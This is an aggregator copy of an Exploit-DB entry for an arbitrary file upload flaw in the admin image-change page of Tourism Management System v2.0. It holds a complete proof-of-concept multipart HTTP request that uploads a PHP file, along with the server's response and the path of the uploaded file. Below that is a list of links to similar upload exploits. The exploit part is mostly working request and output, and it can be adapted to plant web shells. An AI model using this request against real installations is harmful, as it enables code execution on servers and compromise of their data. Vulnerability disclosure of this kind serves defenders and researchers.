[webapps] Tourism Management System v2.0 - Arbitrary File Upload
source link: https://www.exploit-db.com/exploits/51923
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Tourism Management System v2.0 - Arbitrary File Upload
# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
# Google Dork: N/A
# Exploit Author: SoSPiro
# Date: 2024-02-18
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Allows admin to upload all files to the web server
# CVE : N/A
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.
# PoC request
POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
Content-Length: 361
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
Content-Type: text/plain
<?php phpinfo();?>
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="submit"
-----------------------------390927495111779706051786831201--
===========================================================================================
- Response -
HTTP/1.1 200 OK
Date: Sun, 18 Feb 2024 04:33:37 GMT
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/8.1.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8146
============================================================================================
- File location -
http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php
Recommend
-
14
Vendor Homepage: https://www.sourcecodester.com Source Code Download: Company...
-
9
iBooking v1.0.8 - Arbitrary File Upload ...
-
12
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE...
-
9
Roxy Fileman 1.4.5 - Arbitrary File Upload ...
-
9
KodExplorer 4.49 - CSRF to Arbitrary File Upload ...
-
13
Faculty Evaluation System 1.0 - Unauthenticated File Upload
-
9
Teachers Record Management System 1.0 - File Upload Type Validation...
-
8
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)...
-
9
Academy LMS 6.1 - Arbitrary File Upload ...
-
6
Lot Reservation Management System - Unauthenticated File Upload and Remote Code Execution...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK